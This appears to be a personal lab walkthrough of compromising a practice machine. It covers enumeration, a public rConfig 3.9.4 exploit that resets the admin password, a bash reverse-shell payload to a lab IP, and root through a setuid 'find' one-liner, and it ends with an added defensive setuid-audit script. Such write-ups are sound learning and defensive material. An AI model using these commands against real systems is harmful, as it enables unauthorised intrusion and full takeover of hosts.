## Enumeration

- ftp - 21
	- anon login permitted
	- trolls w. passive mode
	- very likely a rabbit hole
- ssh - 22
- 1111 - rpcbind - ??

### samba/smb - 445

- null sessions?
	- permitted
	- shares:
		- `print`
		- `IPC`

Samba `v.4.10.4`

### webserver - `80`

Seems to be a mere static page.

Running [[FFUF]] to discover directories...

```
╭─[λ]-[/targets/quackerjack]-[192.168.188.57]
╰─> ffuf -u http://$RHOST/FUZZ -c -w /arsenal/wordlists/raft-medium-words.txt -mc 200,301,302
```

### `rConfig` - 8081 - Parked

Configuration management WAPP.

https://github.com/rconfig/rconfig/blob/main/README.md

Installed version is `3.9.4`:

![[Pasted image 20250331140607.png]]

Current upstream version: `v6.0`

Docs for `v6.0` state default credentials are:

>Username: [email protected]
>Password: admin

Attempting with `admin@quackerjack:admin` gives no love.

Let's have a quick search for known vulns:

![[Pasted image 20250331141138.png]]

Plenty to pick from here. Lowest hanging fruit would be this line:

```
rConfig 3.9.5 - Remote Code Execution (Unauthenticated) | php/webapps/48878.py
```

Note that this may specifically be for `v3.9.5` and thus not work for `v.3.9.4`.

There's also this: https://www.exploit-db.com/exploits/48241 which is specifically for `v.3.9.4`.

That works out:

```
Method>2
(+) The admin user is present in this rConfig instance
(+) The new password for the admin user is Testing1@
Choose method for RCE:
1) Unsafe call to exec()
2) Template edit
```

Couldn't get shell working... took a walk and bought a new hoodie.

Came back, reset the box and changed the payload on line `23`:

```python
payload = "/bin/bash -i >& /dev/tcp/192.168.45.231/445 0>&1"
```

Got shell.

```
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
```

Took like an hour + break time.

## Privesc

Ideas: internal ports

Potentially SUID `/usr/bin/find`

```
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
strace Not Found
...
-rwsr-xr-x. 1 root root 195K Oct 30 2018 /usr/bin/find
...
```

95% privesc vector (gold highlight in linpeas output).

```
find . -exec /bin/sh -p \; -quit
```

Aaaaaaand we get `root` in about 10 minutes:

## Lessons Learned

- Got more reps in.
- More SUID binary exploitation.
- Taking a break is gold for getting unstuck.
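
From the defender's side, the setuid `/usr/bin/find` from the Privesc section is exactly what a setuid baseline audit is meant to catch. The script below is an added example, not part of the original write-up; the `audit_suid` function, the baseline file format (one absolute path per line), the `/etc/suid.baseline` path and the `RISKY_SUID` list are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: audit setuid files against a known-good baseline.
# RISKY_SUID is a constructed, non-exhaustive list of programs that can run
# other commands or write arbitrary files, so they should never carry the bit.
RISKY_SUID="find bash sh dash env vim python python3 perl php cp"

# audit_suid BASELINE ROOT...
#   BASELINE: file with one expected setuid path per line (assumed format)
#   ROOT:     one or more directories to scan
# Prints "RISKY <path>" or "NEW <path>" for every setuid file not in BASELINE.
audit_suid() {
    baseline=$1
    shift
    find "$@" -xdev -type f -perm -4000 2>/dev/null |
    while IFS= read -r path; do
        # Paths already approved in the baseline are expected; skip them.
        if grep -Fxq -- "$path" "$baseline" 2>/dev/null; then
            continue
        fi
        verdict=NEW
        # Match on the file name only, so the binary is caught in any directory.
        case " $RISKY_SUID " in
            *" ${path##*/} "*) verdict=RISKY ;;
        esac
        printf '%s %s\n' "$verdict" "$path"
    done
}

# Stand-alone use (hypothetical baseline path):
#   sh audit_suid.sh /etc/suid.baseline /usr /bin
if [ "$#" -ge 2 ]; then
    audit_suid "$@"
fi
```

A `RISKY` hit is cleared with `chmod u-s <path>` once nothing is confirmed to depend on the bit; a `NEW` hit either goes into the baseline after review or gets the same treatment.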